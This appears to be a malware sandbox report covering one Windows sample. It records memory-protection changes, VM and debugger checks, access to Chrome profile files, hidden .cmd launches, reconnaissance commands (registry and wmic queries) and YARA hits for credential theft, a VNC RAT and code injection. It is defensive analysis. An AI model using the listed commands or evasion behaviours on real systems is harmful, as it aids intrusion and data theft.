CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefda50c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefd90a4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefd91d551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefda5347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefda5122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefda53542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefd91d42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefd91d1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x769c9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x769c98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefd91d0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefda43e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefd8f0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefd8f0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76c2652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76d5c521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefd4fa49d
registers.r14: 0
registers.r15: 0
registers.rcx: 49603664
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 49609616
registers.r11: 49605424
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1947452090
registers.r13: 0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (32 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x736b1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73951000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72b01000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ac4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72b02000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72781000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72761000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73921000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72741000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75941000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x764b1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75831000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72b71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72701000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x726e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x726a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72631000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2592 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04070000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2592 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x040e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72622000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2592 region_size: 1835008 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04480000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2592 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04600000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 1452 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000006510000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2916 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000073fb3000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:24 a.m.	process_identifier: 2612 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10:24 a.m.	process_identifier: 2776 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:24 a.m.	process_identifier: 2900 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:24 a.m.	process_identifier: 284 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:24 a.m.	process_identifier: 2756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000741f3000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:24 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10:24 a.m.	process_identifier: 2268 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (2 events)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW April 21, 2025, 10:23 a.m.	total_number_of_free_bytes: 13320065024 free_bytes_available: 13320065024 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0
GetDiskFreeSpaceW April 21, 2025, 10:23 a.m.	number_of_free_clusters: 3251969 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1	0

An application raised an exception which may be indicative of an exploit crash (2 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process chrome.exe with pid 2612 crashed
__exception__ April 21, 2025, 10:24 a.m.	stacktrace: 0x5b2e04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 c1 76 exception.instruction: call qword ptr [rip + 0x91f16] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5b2e04 registers.r14: 186116528 registers.r15: 186116968 registers.rcx: 1408 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 86113632 registers.rsp: 186115704 registers.r11: 186120224 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1440 registers.r12: 33405952 registers.rbp: 186115840 registers.rdi: 33140288 registers.rax: 5975552 registers.r13: 186116400	1	0	0

Steals private information from local Internet browsers (27 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-spare.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Stability\2612-1745198644343750.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeFilenameClientIncident.store
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports\548ac076-5da7-47a7-9994-548a341db157.dmp
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-6805EDF0-A34.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-active.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-63327DF3-A54.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\First Run
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom Prefix Set
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\AnyIpMalware.store
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\metadata
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3

Creates executable files on the filesystem (1 event)

file	C:\Games\cmmc.cmd

Creates a suspicious process (4 events)

cmdline	C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
cmdline	C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
cmdline	C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
cmdline	wmic process where (name="taskhost.exe") get commandline

Executes one or more WMI queries (1 event)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW April 21, 2025, 10:23 a.m.	show_type: 0 filepath_r: C:\Games\cmmc.cmd parameters: filepath: C:\Games\cmmc.cmd	1	1
ShellExecuteExW April 21, 2025, 10:24 a.m.	show_type: 0 filepath_r: C:\Games\c.cmd parameters: filepath: C:\Games\c.cmd	1	1
ShellExecuteExW April 21, 2025, 10:24 a.m.	show_type: 0 filepath_r: C:\Games\once.cmd parameters: filepath: C:\Games\once.cmd	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (50 out of 90 events)

Time & API	Arguments	Status	Return
Process32NextW April 21, 2025, 10:23 a.m.	snapshot_handle: 0x0000014c process_name: taskhost.exe process_identifier: 2416	1	1
Process32NextW April 21, 2025, 10:23 a.m.	snapshot_handle: 0x0000014c process_name: msiexec.exe process_identifier: 2708	1	1
Process32NextW April 21, 2025, 10:23 a.m.	snapshot_handle: 0x0000014c process_name: viewer.exe process_identifier: 2916	1	1
Process32NextW April 21, 2025, 10:23 a.m.	snapshot_handle: 0x0000014c process_name: cmd.exe process_identifier: 3016	1	1
Process32NextW April 21, 2025, 10:23 a.m.	snapshot_handle: 0x0000014c process_name: conhost.exe process_identifier: 744	1	1
Process32NextW April 21, 2025, 10:23 a.m.	snapshot_handle: 0x0000014c process_name: cmd.exe process_identifier: 1152	1	1
Process32NextW April 21, 2025, 10:23 a.m.	snapshot_handle: 0x0000014c process_name: cmd.exe process_identifier: 2072	1	1
Process32NextW April 21, 2025, 10:23 a.m.	snapshot_handle: 0x0000014c process_name: is32bit.exe process_identifier: 2080	1	1
Process32NextW April 21, 2025, 10:23 a.m.	snapshot_handle: 0x0000014c process_name: is32bit.exe process_identifier: 2100	1	1
Process32NextW April 21, 2025, 10:23 a.m.	snapshot_handle: 0x0000014c process_name: inject-x64.exe process_identifier: 1336	1	1
Process32NextW April 21, 2025, 10:23 a.m.	snapshot_handle: 0x0000014c process_name: reg.exe process_identifier: 152	1	1
Process32NextW April 21, 2025, 10:23 a.m.	snapshot_handle: 0x0000014c process_name: inject-x64.exe process_identifier: 320	1	1
Process32NextW April 21, 2025, 10:23 a.m.	snapshot_handle: 0x0000014c process_name: inject-x64.exe process_identifier: 2216	1	1
Process32NextW April 21, 2025, 10:23 a.m.	snapshot_handle: 0x0000014c process_name: findstr.exe process_identifier: 2260	1	1
Process32NextW April 21, 2025, 10:23 a.m.	snapshot_handle: 0x0000014c process_name: WerFault.exe process_identifier: 2480	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x0000014c process_name: cmd.exe process_identifier: 2508	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x0000014c process_name: conhost.exe process_identifier: 2588	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x0000014c process_name: chrome.exe process_identifier: 2612	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x0000014c process_name: is32bit.exe process_identifier: 2620	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x0000014c process_name: is32bit.exe process_identifier: 2724	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x0000014c process_name: inject-x64.exe process_identifier: 2764	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x0000014c process_name: viewer.exe process_identifier: 2776	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x0000014c process_name: is32bit.exe process_identifier: 2812	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x0000014c process_name: inject-x86.exe process_identifier: 2852	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: chrome.exe process_identifier: 2900	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: conhost.exe process_identifier: 2888	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: inject-x64.exe process_identifier: 3060	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: mode.com process_identifier: 2084	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: inject-x64.exe process_identifier: 1404	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: chrome.exe process_identifier: 284	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: cmd.exe process_identifier: 2212	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: is32bit.exe process_identifier: 2108	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: svchost.exe process_identifier: 416	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: taskkill.exe process_identifier: 2244	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: is32bit.exe process_identifier: 2264	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: inject-x64.exe process_identifier: 2328	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: cmd.exe process_identifier: 1528	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: inject-x64.exe process_identifier: 1064	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: reg.exe process_identifier: 2396	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: inject-x64.exe process_identifier: 2232	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: cmd.exe process_identifier: 2184	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: is32bit.exe process_identifier: 2308	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: inject-x64.exe process_identifier: 2304	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: inject-x64.exe process_identifier: 1616	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: WmiPrvSE.exe process_identifier: 1080	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: cmd.exe process_identifier: 2524	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: mode.com process_identifier: 2848	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: is32bit.exe process_identifier: 2796	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: inject-x64.exe process_identifier: 2700	1	1
Process32NextW April 21, 2025, 10:24 a.m.	snapshot_handle: 0x00000164 process_name: timeout.exe process_identifier: 2944	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 21, 2025, 10:23 a.m.	process_identifier: 2916 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8192 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x002d0000 process_handle: 0xffffffff	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (19 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW April 21, 2025, 10:23 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW April 21, 2025, 10:23 a.m.	system_name: privilege_name: SeCreateTokenPrivilege	1	1
LookupPrivilegeValueW April 21, 2025, 10:23 a.m.	system_name: privilege_name: SeAssignPrimaryTokenPrivilege	1	1
LookupPrivilegeValueW April 21, 2025, 10:23 a.m.	system_name: privilege_name: SeMachineAccountPrivilege	1	1
LookupPrivilegeValueW April 21, 2025, 10:23 a.m.	system_name: privilege_name: SeTcbPrivilege	1	1
LookupPrivilegeValueW April 21, 2025, 10:23 a.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW April 21, 2025, 10:23 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW April 21, 2025, 10:23 a.m.	system_name: privilege_name: SeLoadDriverPrivilege	1	1
LookupPrivilegeValueW April 21, 2025, 10:23 a.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW April 21, 2025, 10:23 a.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW April 21, 2025, 10:23 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW April 21, 2025, 10:23 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 21, 2025, 10:23 a.m.	system_name: privilege_name: SeRemoteShutdownPrivilege	1	1
LookupPrivilegeValueW April 21, 2025, 10:23 a.m.	system_name: privilege_name: SeEnableDelegationPrivilege	1	1
LookupPrivilegeValueW April 21, 2025, 10:23 a.m.	system_name: privilege_name: SeManageVolumePrivilege	1	1
LookupPrivilegeValueW April 21, 2025, 10:23 a.m.	system_name: privilege_name: SeCreateGlobalPrivilege	1	1
LookupPrivilegeValueW April 21, 2025, 10:24 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 21, 2025, 10:24 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 21, 2025, 10:24 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Potentially malicious URLs were found in the process memory dump (50 out of 1134 events)

url	http://java.sun.com/products/plugin/index.html
url	http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab
url	http://www.uvnc.com
url	http://forum.uvnc.com
url	https://crashpad.chromium.org/bug/new
url	https://crashpad.chromium.org/
url	https://clients4.google.com/invalidation/android/request/
url	http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
url	http://services.ukrposhta.com/postindex_new/
url	http://dts.search-results.com/sr?lng=
url	http://inposdom.gob.do/codigo-postal/
url	http://creativecommons.org/ns
url	http://www.postur.fo/
url	https://qc.search.yahoo.com/search?ei=
url	https://cacert.omniroot.com/baltimoreroot.crt09
url	http://crbug.com/122474.
url	https://search.yahoo.com/search?ei=
url	http://t1.symcb.com/ThawtePCA.crl0/
url	http://crbug.com/31395.
url	https://support.google.com/chrome/answer/165139
url	http://crbug.com/320723
url	https://datasaver.googleapis.com/v1/clientConfigs
url	http://crl.starfieldtech.com/sfroot-g2.crl0L
url	https://ct.startssl.com/
url	https://suggest.yandex.com.tr/suggest-ff.cgi?part=
url	https://de.search.yahoo.com/favicon.ico
url	https://github.com/GoogleChrome/Lighthouse/issues
url	http://www.searchnu.com/favicon.ico
url	https://support.google.com/installer/?product=
url	http://msdn.microsoft.com/en-us/library/ms792901.aspx
url	https://www.najdi.si/search.jsp?q=
url	http://x.ss2.us/x.cer0
url	http://crl.geotrust.com/crls/gtglobal.crl04
url	https://accounts.google.com/ServiceLogin
url	https://accounts.google.com/OAuthLogin
url	https://c.android.clients.google.com/
url	https://www.google.com/tools/feedback/chrome/__submit
url	https://chrome.google.com/webstore/category/collection/dark_themes
url	http://check.googlezip.net/generate_204
url	http://ocsp.starfieldtech.com/08
url	http://www.guernseypost.com/postcode_finder/
url	http://crl.certum.pl/ca.crl0h
url	http://ator
url	https://suggest.yandex.by/suggest-ff.cgi?part=
url	http://feed.snap.do/?q=
url	https://sp.uk.ask.com/sh/i/a16/favicon/favicon.ico
url	http://www.language
url	https://support.google.com/chrome/
url	http://developer.chrome.com/apps/declare_permissions.html
url	http://www.google.com/chrome/intl/ko/eula_text.html

Yara rule detected in process memory (50 out of 1438 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Remote Administration toolkit VNC	rule	RAT_VNC
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
